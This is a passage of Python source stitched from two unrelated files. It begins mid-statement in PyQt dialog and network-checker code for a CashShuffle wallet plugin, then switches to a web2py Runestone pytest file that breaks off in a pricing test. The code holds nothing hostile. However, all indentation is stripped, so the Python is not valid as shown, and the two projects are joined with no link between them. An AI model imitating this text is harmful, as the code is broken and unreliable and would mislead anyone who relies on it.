.format(_('Server'), _elide(d['host'], maxlen=40, startlen=12),
_('Status'), green if not d['banned'] else "#dd4444", d['status'], " <b>{}</b> {}".format(_("Ban score:"),d['banScore']) if d['banScore'] else '', '<br>' if d['banScore'] else '',
_('Pool size'), d['poolSize'],
_('Connections'),
d['connections'],
_('Active pools'), d['pools'])
)
def _on_formChange(self):
try:
#self.print_error("onFormChange")
d = self.get_form()
self.settingsChanged.emit(d)
except RuntimeError as e:
# Paranoia guard against C++ object deleted exception
# (we may get called from a QTimer.singleShot below)
if 'C++' not in str(e).upper():
raise
def startNetworkChecker(self):
if self.networkChecker: return
self.networkChecker = NetworkChecker(self)
self.statusChanged.connect(self._on_statusChanged, Qt.QueuedConnection)
self.formChanged.connect(self._on_formChange, Qt.QueuedConnection)
self.print_error("Starting network checker...")
self.networkChecker.start()
QTimer.singleShot(100, self._on_formChange) # kicks off the network checker by sending it new settings
def stopNetworkChecker(self):
if self.networkChecker:
try: self.statusChanged.disconnect(self._on_statusChanged)
except TypeError: pass # not connected
            try: self.formChanged.disconnect(self._on_formChange)
except TypeError: pass # not connected
self.networkChecker.stop()
self.networkChecker = None
self.print_error("Stopped network checker.")
# /
# /SettingsDialogMixin
class SettingsDialog(SettingsDialogMixin, AppModalDialog):
''' Concrete class for the stand-alone Settings window you get when
you right-click and get "CashShuffle Settings..." from the CashShuffle status
button context menu '''
def __init__(self, title, config, message=None, windowFlags=None):
AppModalDialog.__init__(self, title=title, windowFlags=windowFlags, parent=None)
self.setMinimumSize(400, 350)
SettingsDialogMixin.__init__(self, config=config, message=message)
# /SettingsDialog
class SettingsTab(SettingsDialogMixin, QWidget):
# Apparently if you inherit from a C++ object first it creates problems.
# You are supposed to inherit from the mixins in Python first, then the
# Qt C++ object last. Who knew. All of Electron Cash codebase apparently
# is doing it wrong.
# See this: http://python.6.x6.nabble.com/Issue-with-multiple-inheritance-td5207771.html
# So we inherit from our mixin first. (Note I had problems with overriding
# __init__ here and Qt's C++ calling the wrong init here.)
applyChanges = pyqtSignal(object)
def __init__(self, parent, config, message=None):
QWidget.__init__(self, parent=parent)
SettingsDialogMixin.__init__(self, config=config, message=message)
# add the "Apply" button to the bottom
self.apply = QPushButton(_("Apply"), self)
hbox = QHBoxLayout()
self.vbox.addLayout(hbox)
self.vbox.addStretch()
hbox.addStretch(1)
hbox.addWidget(self.apply)
self.apply.clicked.connect(self._re_emit_applyChanges)
def _re_emit_applyChanges(self):
self.applyChanges.emit(self)
def _vpOnPoolsBut(self):
w = PoolsWinMgr.show(self._vpLastStatus, self.get_form(), self.config, modal=False, parent_window=self)
# /SettingsTab
class NetworkChecker(PrintError):
''' Runs in a separate thread, checks the server automatically when the settings form changes
and publishes results to GUI thread. '''
pollTimeSecs = 15.0
checkShufflePort = True
verifySSL = True # if true, verify the ssl socket of the shuffle port when checking the server
def __init__(self, parent):
assert isinstance(parent, NetworkCheckerDelegateMixin), "Parent to NetworkChecker must be a NetworkCheckerDelegateMixin"
self.weakParent = Weak.ref(parent)
self.q = queue.Queue()
self.thread = threading.Thread(target=self.thread_func, daemon=True)
self._please_stop = False
self._sock = None
self._update_ct = 0
parent.settingsChanged.connect(self._on_settings_changed, Qt.QueuedConnection)
self.print_error("created")
finalization_print_error(self)
def stop(self):
if self.thread.is_alive():
self._please_stop = True
self.q.put(None) # signal to thread to die
try: self._sock.close() # force close thread
except: pass
self.thread.join(timeout=15.0) # wait for thread to finish
if self.thread.is_alive():
# This should never happen
self.print_error("*** WARNING: Waited for thread to exit for 15.0 seconds, but it is still running! FIXME!")
def start(self):
if not self.thread.is_alive():
self.q.put(None) # paranoia just in case
self.q = queue.Queue() # clear the queue
self._please_stop = False
self.thread.start() # this raises RuntimeError if called more than once.
def _on_settings_changed(self, d):
self._update_ct = 0 # reset ctr for these settings. ctr = 0 causes us to tell gui to draw the "Connecting, please wait..." text
self.q.put(d.copy()) # notify thread which waits on this q
def _wait_drain_q(self, last_settings):
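        # Drains the settings queue and returns the newest settings dict,
        # None if the thread was asked to stop, or `last_settings` unchanged if
        # nothing new arrived within pollTimeSecs (so we re-poll the same server).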
q = self.q
try:
res = None
try:
# Drain queue to get latest settings
while True:
# keep reading from the queue until it's empty
res = q.get_nowait()
if res is None:
# we got a None, return early -- this indicates abort thread
return res
except queue.Empty:
''' No settings were waiting in queue.. move to blocking
operation '''
if self._please_stop:
return # indicate stop
if res is not None:
# we had a result, return
return res
# no result from Queue, block for pollTimeSecs
return q.get(timeout=self.pollTimeSecs)
except queue.Empty:
# no result in pollTimeSecs, return last settings value
return last_settings
def thread_func(self):
try:
self.print_error("thread entered")
settings = dict()
while True:
settings = self._wait_drain_q(settings)
if settings is None:
return # exit thread if we got a None
if settings:
self._on_update_status(settings)
finally:
self.print_error("thread exiting")
def _emit_status_changed(self, d):
self.weakParent() and self.weakParent().statusChanged.emit(d)
def _on_update_status(self, d):
d = d.copy()
#self.print_error("updateStatus", d) # XXX
is_bad_server, is_bad_ssl, is_offline_mode = False, False, False
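        # These flags let the except handler below report a specific failure
        # reason ('offline_mode', 'ssl', 'bad') back to the GUI instead of a
        # generic connection failure.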
try:
if not Network.get_instance():
is_offline_mode = True
raise RuntimeError("No network")
if self._update_ct == 0:
self._emit_status_changed(dict()) # tells GUI we are "connecting..."
self._update_ct += 1
port, poolSize, connections, pools, banScore, banned = query_server_for_stats(d['server'], d['info'], d['ssl'])
if self._please_stop:
return
if poolSize < 3:
# hard-coded -- do not accept servers with poolSize < 3
is_bad_server = True
raise RuntimeError("PoolSize must be >=3, got: {}".format(poolSize))
if d['ssl'] and self.verifySSL and not verify_ssl_socket(d['server'], int(port), timeout=7.5):
is_bad_ssl = True
raise RuntimeError("Could not verify SSL server certificate.")
if self._please_stop:
return
if self.checkShufflePort:
self._sock = socket.create_connection((d['server'], port), 5.0) # test connectivity to port
self._sock.close()
self._sock = None
if self._please_stop:
return
self._emit_status_changed({
'host' : d['server'],
'status' : _('Ok') if not banned else _('Banned'),
'poolSize' : str(poolSize),
'connections' : str(connections),
'pools' : str(len(pools)),
'poolsList' : pools,
'banScore' : banScore,
'banned' : banned,
'name' : d['server'] + ":" + str(d['info']),
'info' : d['info'],
'ssl' : d['ssl'],
})
except Exception as e:
# DEBUG
#import traceback
#traceback.print_exc()
# /DEBUG
self.print_error("exception on connect:",str(e))
if is_offline_mode:
self._emit_status_changed({'failed' : 'offline_mode'})
elif is_bad_ssl:
self._emit_status_changed({'failed' : 'ssl'})
elif is_bad_server:
self._emit_status_changed({'failed' : 'bad'})
else:
self._emit_status_changed({'failed' : 'failed'})
# / NetworkChecker
class PoolsWinMgr(QObject, PrintError):
simpleChangedSig = pyqtSignal()
_instance = None
def __init__(self):
assert not PoolsWinMgr._instance, "More than 1 PoolsWinMgr instance detected -- PoolsWinMgr is a singleton!"
super().__init__()
PoolsWinMgr._instance = self
self.poolWindows = {}
self.print_error("created")
#DEBUG
destroyed_print_error(self)
def __del__(self):
stale = True
if PoolsWinMgr._instance is self:
PoolsWinMgr._instance = None
stale = False
print_error("[{}] finalized{}".format(__class__.__name__, " (stale instance)" if stale else ''))
if hasattr(super(), '__del__'):
super().__del__()
#public methods
@classmethod
def instance(cls, create_if_missing=True):
if not cls._instance and create_if_missing:
cls._instance = cls()
return cls._instance
@classmethod
def killInstance(cls):
if cls._instance:
cls._instance._killAll()
cls._instance.deleteLater()
cls._instance = None
@classmethod
def closeAll(cls):
        ''' This implicitly will also delete all the windows when the event loop next runs. '''
app = QApplication.instance()
if app:
poolWins = [w for w in app.topLevelWidgets() if isinstance(w, PoolsWindow)]
for w in poolWins:
w.close()
@classmethod
def show(cls, stats_dict, network_settings, config, *, parent_window=None, modal=False):
mgr = cls.instance()
return mgr._createOrShow(stats_dict, network_settings, config, parent_window=parent_window, modal=modal)
#private methods
def _createOrShow(self, stats_dict, network_settings, config, *, parent_window=None, modal=False):
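        # Windows are keyed by the server's 'name' (host:port). Re-use an
        # existing window for that server if its modality matches what was
        # requested; otherwise kill it and create a fresh one.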
d = stats_dict
if not isinstance(d, dict) or not d or not network_settings:
self.print_error("createOrShow: got invalid args.. will not create/show a window")
return
name = d['name']
w = self.poolWindows.get(name)
if w and ((modal and w.windowModality() != Qt.ApplicationModal)
or (not modal and w.windowModality() != Qt.NonModal)):
self.print_error("Found extant window {} but modal spec != extant modal, killing...".format(name))
self._kill(name)
w = None
if not w:
self.print_error("Creating", name)
w = PoolsWindow(config, parent_window, d, network_settings, modal=modal)
self.poolWindows[name] = w
w.closed.connect(self._kill) # clean-up instance
else:
self.print_error("Updating", name)
w.weakParent = Weak.ref(parent_window) if parent_window else None
w.settings = network_settings
w.settingsChanged.emit(w.settings)
if w.isMinimized():
w.showNormal()
w.show(); w.raise_(); w.activateWindow()
return w
def _kill(self, name):
window = self.poolWindows.pop(name) # will actually delete the QWidget instance.
window.stopNetworkChecker()
window.deleteLater() # force Qt delete. This call may be superfluous
self.print_error("Killed", name)
def _killAll(self):
for n in self.poolWindows.copy():
self._kill(n)
# /PoolsWinMgr
class PoolsWindow(QWidget, PrintError, NetworkCheckerDelegateMixin):
closed = pyqtSignal(str)
# from base: settingsChanged = pyqtSignal(dict)
# from base: statusChanged = pyqtSignal(dict)
def __init__(self, config, pseudo_parent, serverDict, settings, modal=False):
super().__init__() # top-level window
self.setWindowModality(Qt.ApplicationModal if modal else Qt.NonModal)
self.config = config
self.weakParent = Weak.ref(pseudo_parent) if pseudo_parent else None
self.sdict = serverDict.copy()
self.settings = settings
self.networkChecker = None
self.needsColumnSizing = True
name = self.sdict['name']
self.setObjectName(name)
self.setWindowTitle("CashShuffle - {} - Pools".format(_elide(name)))
self.vbox = QVBoxLayout(self)
# pools group box
self.poolsGB = QGroupBox(_("{} Pools").format(_elide(name)) + " (0)")
self.vbox.addWidget(self.poolsGB)
self.vbox.setStretchFactor(self.poolsGB, 2)
vbox2 = QVBoxLayout(self.poolsGB)
# ban label
self.banLabel = HelpLabel('', _("Bans usually occur when other shufflers detected invalid inputs coming from your client. Bans are temporary and usually last up to 30 minutes.\n\nThey may happen occasionally in rare circumstances. However, if this keeps happening please contact the developers and file a bug report."))
self.banLabel.setHidden(True)
vbox2.addWidget(self.banLabel)
self.tree = QTreeWidget()
self.tree.setSelectionMode(QAbstractItemView.NoSelection)
self.tree.setMinimumHeight(50)
self.tree.setHeaderItem(QTreeWidgetItem([_('Tier'), _('Players'), _('Type'), _('Version'), _('Full')]))
vbox2.addWidget(self.tree)
# The "simple view" checkbox
hbox = QHBoxLayout()
self.simpleChk = QCheckBox(_("Omit incompatible pools")) # NB: checkbox state will be set in self.refresh()
hbox.addWidget(self.simpleChk)
vbox2.addLayout(hbox)
# bottom buts
self.vbox.addStretch()
hbox = QHBoxLayout()
self.closeBut = QPushButton(_("Close"))
hbox.addStretch(1)
hbox.addWidget(self.closeBut)
self.vbox.addLayout(hbox)
# signals
self.closeBut.clicked.connect(self.close)
self.closeBut.setDefault(True)
self.statusChanged.connect(self.refresh)
self.simpleChk.clicked.connect(self._setSimple)
# NB: some signal/slot connections are also made in showEvent()
# etc...
self.resize(400,300)
#DEBUG
destroyed_print_error(self)
def diagnostic_name(self):
return "{}/{}".format(super().diagnostic_name(), self.objectName())
def closeEvent(self, e):
#self.print_error("Close")
self.closed.emit(self.objectName())
parent = self.weakParent and self.weakParent()
if isinstance(parent, QWidget) and parent.isVisible() and parent.window().isVisible():
try:
# for some reason closing this dialog raises the wallet window and not the network dialog
# activate the network dialog if it's up..
parent.window().activateWindow()
except RuntimeError as e:
# Deal with wrapped C/C++ object deleted. For some reason
# the weakRef is still alive even after C/C++ deletion
# (and no other references referencing the object!).
if 'C++' in str(e):
self.print_error("Underlying C/C++ object deleted. Working around PyQt5 bugs and ignoring...")
else:
raise
super().closeEvent(e)
e.accept()
def hideEvent(self, e):
super().hideEvent(e)
if e.isAccepted():
#self.print_error("Hide")
try: PoolsWinMgr.instance().simpleChangedSig.disconnect(self._simpleChangedSlot)
except TypeError: pass # Not connected.
self.stopNetworkChecker()
def showEvent(self, e):
super().showEvent(e)
if e.isAccepted():
#self.print_error("Show")
PoolsWinMgr.instance().simpleChangedSig.connect(self._simpleChangedSlot)
self.refresh(self.sdict)
self.startNetworkChecker()
# do stuff related to refreshing, etc here...
def _isSimple(self):
return bool(self.config.get(ConfKeys.Global.VIEW_POOLS_SIMPLE, True))
def _setSimple(self, b):
b = bool(b)
if b != self._isSimple():
self.config.set_key(ConfKeys.Global.VIEW_POOLS_SIMPLE, b)
self.needsColumnSizing = True
PoolsWinMgr.instance().simpleChangedSig.emit()
def _simpleChangedSlot(self):
self.refresh(self.sdict)
def refresh(self, sdict):
# NB: sdict may be non-empty (has actual results) but still contain no
# pools if server has no pools. It's only empty before we get a response
# from stats port.
if not sdict:
return
if self.sdict is not sdict:
self.sdict = sdict.copy()
simple = self._isSimple()
self.simpleChk.setChecked(simple)
mysettings = BackgroundShufflingThread.latest_shuffle_settings
# handle if we detected a ban
if self.sdict.get('banned'):
banScore = self.sdict.get('banScore') or 0
self.banLabel.setText('<font color="#dd4444"><b>{}</b></font> (ban score: {})'.format(_("Banned"), banScore))
self.banLabel.setHidden(False)
else:
self.banLabel.setHidden(True)
pools = self.sdict.get('poolsList', list()).copy()
poolSize = str(self.sdict.get('poolSize', ''))
self.tree.clear()
try:
pools.sort(reverse=True, key=lambda x:(0 if x['full'] else 1, x['amount'], x['members'], -x.get('version',0)))
except (KeyError, ValueError, TypeError):
# hmm. Pools dict is missing or has bad keys. Assume bad input. Clear list and proceed with a 'no pools' message
pools = []
for c in range(2,4):
self.tree.setColumnHidden(c, simple)
def grayify(twi):
b = twi.foreground(0)
b.setColor(Qt.gray)
for i in range(twi.columnCount()):
twi.setForeground(i, b)
for p in pools:
typ, version = p.get('type', mysettings.type_name), p.get('version', mysettings.version)
is_my_settings = typ == mysettings.type_name and version == mysettings.version
if not simple or is_my_settings:
twi = QTreeWidgetItem([
format_satoshis_plain(p['amount']) + " BCH",
"{} / {}".format(str(p['members']), poolSize),
str(p.get('type','?')).lower(),
str(p.get('version','?')),
"√" if p['full'] else '-',
])
if not is_my_settings:
grayify(twi)
self.tree.addTopLevelItem(twi)
tit = self.poolsGB.title().rsplit(' ', 1)[0]
self.poolsGB.setTitle(tit + " ({})".format(self.tree.topLevelItemCount()))
def sizeColumnsToFit():
for i in range(self.tree.columnCount()):
self.tree.resizeColumnToContents(i)
if not self.tree.topLevelItemCount():
twi = QTreeWidgetItem([_('No Pools'), '', '', '', ''])
f = twi.font(0); f.setItalic(True); twi.setFont(0, f)
self.tree.addTopLevelItem(twi)
self.tree.setFirstItemColumnSpanned(twi, True)
self.tree.setHeaderHidden(True)
sizeColumnsToFit() # in no pools mode we unconditionally size to fit
self.needsColumnSizing = True # once we enter this "No pools.." mode, we need to force resize columns next time we have real entries to avoid layout weirdness
else:
self.tree.setHeaderHidden(False)
if self.needsColumnSizing: # this flag suppresses resizing each refresh to allow users to manually size the columns after a display with real data appears.
sizeColumnsToFit()
self.needsColumnSizing = False
def _kick_off_nc(self):
try:
self.settingsChanged.emit(self.settings) # kicks off the NetworkChecker by sending it some server settings to check
except RuntimeError:
pass # paranoia: guard against wrapped C++ object exception.. shouldn't happen because timer was keyed off this object as receiver
def startNetworkChecker(self):
if self.networkChecker: return
self.networkChecker = nc = NetworkChecker(self)
nc.pollTimeSecs, nc.verifySSL, nc.checkShufflePort = 2.0, False, False
self.print_error("Starting network checker...")
self.networkChecker.start()
        QTimer.singleShot(500, self._kick_off_nc)  # despite appearances, the timer will not fire after object deletion, due to PyQt5 signal/slot receiver rules
def stopNetworkChecker(self):
if self.networkChecker:
self.networkChecker.stop() # waits for network checker to finish...
self.networkChecker = None
self.print_error("Stopped network checker.")
# /PoolsWindow
class CoinSelectionSettingsWindow(AppModalDialog, PrintError):
''' The pop-up window to manage minimum/maximum coin amount settings.
Accessible from a link in the "CashShuffle Settings.." window or Network
Dialog tab. '''
def __init__(self, title=None):
super().__init__(title=title or _("CashShuffle - Coin Selection Settings"), parent=None)
vbox = QVBoxLayout(self)
lbl = QLabel(_("Specify minimum and maximum coin amounts to select for shuffling:"))
lbl.setWordWrap(True)
vbox.addWidget(lbl)
hbox = QHBoxLayout()
hbox.addWidget(HelpLabel(_("Minimum coin:"),
_("Coins (UTXOs) below this amount will not be selected for shuffling.")))
self.minEdit = BTCAmountEdit(decimal_point=self._decimal_point,
parent=self)
hbox.addWidget(self.minEdit)
vbox.addLayout(hbox)
hbox = QHBoxLayout()
hbox.addWidget(HelpLabel(_("Maximum coin:"),
_("Coins (UTXOs) up to this amount will be selected for shuffling.")))
self.maxEdit = BTCAmountEdit(decimal_point=self._decimal_point,
parent=self)
hbox.addWidget(self.maxEdit)
vbox.addLayout(hbox)
self.maxEdit.textEdited.connect(self.clearErr)
self.minEdit.textEdited.connect(self.clearErr)
vbox.addStretch()
self.errLabel = QLabel("")
self.errLabel.setAlignment(Qt.AlignCenter)
vbox.addWidget(self.errLabel)
vbox.addStretch()
vbox.addLayout(Buttons(CancelButton(self),
EnterButton(_("Defaults"), self.default),
EnterButton(_("Apply"), self.apply),
))
self.resize(320,200)
self.fromConfig()
# DEBUG Qt destruction
destroyed_print_error(self)
def _decimal_point(self): return get_config().get('decimal_point', 8)
def _fmt_amt(self, amt): return format_satoshis_plain(amt, self._decimal_point())
def apply(self):
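        # Validation order: both amounts must be present with min < max, then each is
        # checked against BackgroundShufflingThread's hard lower/upper bounds; settings
        # are only written (or reset to defaults) if they actually changed.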
lower, upper = self.minEdit.get_amount(), self.maxEdit.get_amount()
if not lower or not upper or upper <= lower:
self.setErr(_("Invalid amount"))
return
hard_upper = BackgroundShufflingThread.hard_upper_bound()
if upper > hard_upper:
self.setErr(_("Upper limit is {}").format(self._fmt_amt(hard_upper)))
return
hard_lower = BackgroundShufflingThread.hard_lower_bound()
if lower < hard_lower:
self.setErr(_("Lower limit is {}").format(self._fmt_amt(hard_lower)))
return
if (lower, upper) != tuple(BackgroundShufflingThread.update_lower_and_upper_bound_from_config()):
pre = ''
if (lower, upper) == self._get_defaults():
BackgroundShufflingThread.reset_lower_and_upper_bound_to_defaults()
pre = _("Default values restored.\n\n")
else:
actual_lower, actual_upper = BackgroundShufflingThread.set_lower_and_upper_bound(lower, upper)
if (lower, upper) != (actual_lower, actual_upper):
pre = _("Actual amounts applied: {} and {}.\n\n").format(self._fmt_amt(actual_lower),
self._fmt_amt(actual_upper))
            self.show_message(pre+_("Changes will take effect when the next shuffle round starts (usually within a few minutes)."))
self.accept()
def fromConfig(self):
lower, upper = BackgroundShufflingThread.update_lower_and_upper_bound_from_config()
self.minEdit.setAmount(lower)
self.maxEdit.setAmount(upper)
self.clearErr()
def _get_defaults(self): return BackgroundShufflingThread.DEFAULT_LOWER_BOUND, BackgroundShufflingThread.DEFAULT_UPPER_BOUND
def default(self):
lower, upper = self._get_defaults()
self.minEdit.setAmount(lower)
self.maxEdit.setAmount(upper)
self.clearErr()
def setErr(self, txt='', noerr=False):
txt = txt or ""
if noerr:
try: color = ColorScheme.DEFAULT._get_color(0)
except AttributeError: color = "#666666"
else:
try: color = ColorScheme.RED._get_color(0)
except AttributeError: color = "red"
self.errLabel.setText('<font color="{}">{}</font>'.format(color, txt))
def clearErr(self): self.setErr('', noerr=True)
# /CoinSelectionSettingsWindow
|
test_server.py
|
# *****************************************
# |docname| - Tests using the web2py server
# *****************************************
# These tests start the web2py server then submit requests to it. All the fixtures are auto-imported by pytest from ``conftest.py``.
#
# .. contents::
#
# Imports
# =======
# These are listed in the order prescribed by `PEP 8
# <http://www.python.org/dev/peps/pep-0008/#imports>`_.
#
# Standard library
# ----------------
from textwrap import dedent
import json
from threading import Thread
import datetime
import re
import sys
import time
# Third-party imports
# -------------------
import pytest
import six
# Local imports
# -------------
from .utils import web2py_controller_import
# Debugging notes
# ===============
# Invoke the debugger.
##import pdb; pdb.set_trace()
# Put this in web2py code, then use the web-based debugger.
##from gluon.debug import dbg; dbg.set_trace()
# Tests
# =====
# Use for easy manual testing of the server, by setting up a user and class automatically. Comment out the line below to enable it.
@pytest.mark.skip(reason="Only needed for manual testing.")
def test_manual(runestone_db_tools, test_user):
# Modify this as desired to create courses, users, etc. for manual testing.
course_1 = runestone_db_tools.create_course()
test_user("bob", "bob", course_1)
# Pause in the debugger until manual testing is done.
import pdb
pdb.set_trace()
def test_killer(test_assignment, test_client, test_user_1, runestone_db_tools):
"""
This test ensures that we have the routing set up for testing properly.
This test will fail if routes.py is set up as follows.
routes_onerror = [
('runestone/static/404', '/runestone/static/fail.html'),
('runestone/500', '/runestone/default/reportabug.html'),
]
    For testing purposes we don't want web2py to capture 500 errors.
"""
with pytest.raises(Exception) as excinfo:
test_client.post("admin/killer")
assert test_client.text == ""
print(excinfo.value)
assert "ticket" in str(excinfo.value) or "INTERNAL" in str(excinfo.value)
# Validate the HTML produced by various web2py pages.
# NOTE -- this is the start of a really long ``pytest.mark.parametrize`` decorator for test_validate_user_pages.
@pytest.mark.parametrize(
"url, requires_login, expected_string, expected_errors",
[
# **Admin**
# ----------
# FIXME: Flashed messages don't seem to work.
# ('admin/index', False, 'You must be registered for a course to access this page', 1),
# ('admin/index', True, 'You must be an instructor to access this page', 1),
("admin/doc", True, "Runestone Help and Documentation", 1),
# **Assignments**
# ----------------
("assignments/chooseAssignment", True, "Assignments", 1),
("assignments/doAssignment", True, "Bad Assignment ID", 1),
# TODO: Why 2 errors here? Was just 1.
(
"assignments/practice",
True,
"Practice tool is not set up for this course yet.",
2,
),
("assignments/practiceNotStartedYet", True, "test_course_1", 2),
# **Default**
# ------------
# *User*
#
# The `authentication <http://web2py.com/books/default/chapter/29/09/access-control#Authentication>`_ section gives the URLs exposed by web2py. Check these.
("default/user/login", False, "Login", 1),
("default/user/register", False, "Registration", 1),
("default/user/logout", True, "Logged out", 1),
# One validation error is a result of removing the input field for the e-mail, but web2py still tries to label it, which is an error.
("default/user/profile", True, "Profile", 2),
("default/user/change_password", True, "Change password", 1),
# Runestone doesn't support this.
#'default/user/verify_email', False, 'Verify email', 1),
("default/user/retrieve_username", False, "Retrieve username", 1),
("default/user/request_reset_password", False, "Request reset password", 1),
# This doesn't display a webpage, but instead redirects to courses.
# ('default/user/reset_password, False, 'Reset password', 1),
("default/user/impersonate", True, "Impersonate", 1),
# FIXME: This produces an exception.
#'default/user/groups', True, 'Groups', 1),
("default/user/not_authorized", False, "Not authorized", 1),
# *Other pages*
#
# TODO: What is this for?
# ('default/call', False, 'Not found', 0),
("default/index", True, "Course Selection", 1),
("default/about", False, "About Us", 1),
("default/error", False, "Error: the document does not exist", 1),
("default/ack", False, "Acknowledgements", 1),
# web2py generates invalid labels for the radio buttons in this form.
("default/bio", True, "Tell Us About Yourself", 3),
("default/courses", True, "Course Selection", 1),
("default/remove", True, "Remove a Course", 1),
# Should work in both cases.
("default/reportabug", False, "Report a Bug", 1),
("default/reportabug", True, "Report a Bug", 1),
# ('default/sendreport', True, 'Could not create issue', 1),
("default/terms", False, "Terms and Conditions", 1),
("default/privacy", False, "Runestone Academy Privacy Policy", 1),
("default/donate", False, "Support Runestone Interactive", 1),
# TODO: This doesn't really test much of the body of either of these.
("default/coursechooser", True, "Course Selection", 1),
        # If we choose an invalid course, then we go to the profile to allow the user to add that course. The second validation failure seems to be about the ``for`` attribute of the ``<label class="readonly" for="auth_user_email" id="auth_user_email__label">`` tag, since the id ``auth_user_email`` isn't defined elsewhere.
("default/coursechooser/xxx", True, "Course IDs for open courses", 2),
("default/removecourse", True, "Course Selection", 1),
("default/removecourse/xxx", True, "Course Selection", 1),
(
"dashboard/studentreport",
True,
"Recent Activity",
1,
),
# **Designer**
# -------------
(
"designer/index",
True,
"This page allows you to select a book for your own class.",
1,
),
("designer/build", True, "Build a Custom", 1),
# **OAuth**
# ----------
(
"oauth/index",
False,
"This page is a utility for accepting redirects from external services like Spotify or LinkedIn that use oauth.",
1,
),
("books/index", False, "Runestone Test Book", 1),
("books/published", False, "Runestone Test Book", 1),
# TODO: Many other views!
],
)
def test_validate_user_pages(
url, requires_login, expected_string, expected_errors, test_client, test_user_1
):
if requires_login:
test_user_1.login()
else:
test_client.logout()
test_client.validate(url, expected_string, expected_errors)
# Validate the HTML in instructor-only pages.
# NOTE -- this is the start of a really long ``pytest.mark.parametrize`` decorator for test_validate_instructor_pages.
@pytest.mark.parametrize(
"url, expected_string, expected_errors",
[
# **Default**
# ------------
# web2py-generated stuff produces two extra errors.
("default/bios", "Bios", 3),
# FIXME: The element ``<form id="editIndexRST" action="">`` in ``views/admin/admin.html`` produces the error ``Bad value \u201c\u201d for attribute \u201caction\u201d on element \u201cform\u201d: Must be non-empty.``.
#
# **Admin**
# ----------
("admin/admin", "Course Settings", 1),
("admin/course_students", '"test_user_1"', 2),
("admin/createAssignment", "ERROR", None),
("admin/grading", "assignment", 1),
# TODO: This produces an exception.
# ('admin/practice', 'Choose when students should start their practice.', 1),
# TODO: This deletes the course, making the test framework raise an exception. Need a separate case to catch this.
# ('admin/deletecourse', 'Manage Section', 2),
# FIXME: these raise an exception.
# ('admin/addinstructor', 'Trying to add non-user', 1), -- this is an api call
# ('admin/add_practice_items', 'xxx', 1), -- this is an api call
("admin/assignments", "Assignment", 5), # labels for hidden elements
# ('admin/backup', 'xxx', 1),
("admin/practice", "Choose when students should start", 1),
# ('admin/removeassign', 'Cannot remove assignment with id of', 1),
# ('admin/removeinstructor', 'xxx', 1),
# ('admin/removeStudents', 'xxx', 1),
("admin/get_assignment", "Error: assignment ID", 1),
("admin/get_assignment?assignmentid=junk", "Error: assignment ID", 1),
("admin/get_assignment?assignmentid=100", "Error: assignment ID", 1),
# TODO: added to the ``createAssignment`` endpoint so far.
# **Dashboard**
# --------------
("dashboard/index", "Instructor Dashboard", 1),
("dashboard/grades", "Gradebook", 1),
# TODO: This doesn't really test anything about either
# exercisemetrics or questiongrades other than properly handling a call with no information
("dashboard/exercisemetrics", "Instructor Dashboard", 1),
("dashboard/questiongrades", "Instructor Dashboard", 1),
],
)
def test_validate_instructor_pages(
url, expected_string, expected_errors, test_client, test_user, test_user_1
):
test_instructor_1 = test_user("test_instructor_1", "password_1", test_user_1.course)
test_instructor_1.make_instructor()
# Make sure that non-instructors are redirected.
test_client.logout()
test_client.validate(url, "Login")
test_user_1.login()
test_client.validate(url, "Insufficient privileges")
test_client.logout()
# Test the instructor results.
test_instructor_1.login()
test_client.validate(url, expected_string, expected_errors)
# Test the ``ajax/preview_question`` endpoint.
def test_preview_question(test_client, test_user_1):
preview_question = "ajax/preview_question"
# Passing no parameters should raise an error.
test_client.validate(preview_question, "Error: ")
# Passing something not JSON-encoded should raise an error.
test_client.validate(preview_question, "Error: ", data={"code": "xxx"})
# Passing invalid RST should produce a Sphinx warning.
test_client.validate(preview_question, "WARNING", data={"code": '"*hi"'})
# Passing valid RST with no Runestone component should produce an error.
test_client.validate(preview_question, "Error: ", data={"code": '"*hi*"'})
# Passing a string with Unicode should work. Note that 0x0263 == 611; the JSON-encoded result will use this.
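    # (For reference: chr(0x0263) == "ɣ", and json.dumps("\u0263") yields the
    # ASCII-escaped form '"\\u0263"' because ensure_ascii defaults to True.)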
test_client.validate(
preview_question,
"ɣ",
data={
"code": json.dumps(
dedent(
"""\
.. fillintheblank:: question_1
Mary had a \u0263.
- :x: Whatever.
"""
)
)
},
)
    # Verify that ``question_1`` is not in the database. TODO: This passes even if the ``DBURL`` env variable in the ``ajax.py`` function ``preview_question`` isn't deleted. So, this test doesn't work.
db = test_user_1.runestone_db_tools.db
assert len(db(db.fitb_answers.div_id == "question_1").select()) == 0
# TODO: Add a test case for when the runestone build produces a non-zero return code.
# Test the ``default/user/profile`` endpoint.
def test_user_profile(test_client, test_user_1):
test_user_1.login()
runestone_db_tools = test_user_1.runestone_db_tools
course_name = "test_course_2"
test_course_2 = runestone_db_tools.create_course(course_name)
    # Test a non-existent course.
test_user_1.update_profile(
expected_string="Errors in form", course_name="does_not_exist"
)
# Test an invalid e-mail address. TODO: This doesn't produce an error message.
##test_user_1.update_profile(expected_string='Errors in form',
## email='not a valid e-mail address')
# Change the user's profile data; add a new course.
username = "a_different_username"
first_name = "a different first"
last_name = "a different last"
email = "a_different_email@foo.com"
test_user_1.update_profile(
username=username,
first_name=first_name,
last_name=last_name,
email=email,
course_name=course_name,
accept_tcp="",
is_free=True,
)
# Check the values.
db = runestone_db_tools.db
user = db(db.auth_user.id == test_user_1.user_id).select().first()
    # The username shouldn't be changeable.
assert user.username == test_user_1.username
assert user.first_name == first_name
assert user.last_name == last_name
# TODO: The e-mail address isn't updated.
# assert user.email == email
assert user.course_id == test_course_2.course_id
assert user.accept_tcp == False # noqa: E712
# TODO: I'm not sure where the section is stored.
# assert user.section == section
# Test that the course name is correctly preserved across registrations if other fields are invalid.
def test_registration(test_client, runestone_db_tools):
# Registration doesn't work unless we're logged out.
test_client.logout()
course_name = "a_course_name"
runestone_db_tools.create_course(course_name)
# Now, post the registration.
username = "username"
first_name = "first"
last_name = "last"
email = "e@mail.com"
password = "password"
test_client.validate(
"default/user/register",
"Please fix the following errors in your registration",
data=dict(
username=username,
first_name=first_name,
last_name=last_name,
# The e-mail address must be unique.
email=email,
password=password,
password_two=password + "oops",
# Note that ``course_id`` is (on the form) actually a course name.
course_id=course_name,
accept_tcp="on",
donate="0",
_next="/runestone/default/index",
_formname="register",
),
)
# Check that the pricing system works correctly.
def test_pricing(runestone_db_tools, runestone_env):
# Check the pricing.
default_controller = web2py_controller_import(runestone_env, "default")
db = runestone_db_tools.db
base_course = runestone_db_tools.create_course()
child_course = runestone_db_tools.create_course(
"test_child_course", base_course=base_course.course_name
)
# First, test on a base course.
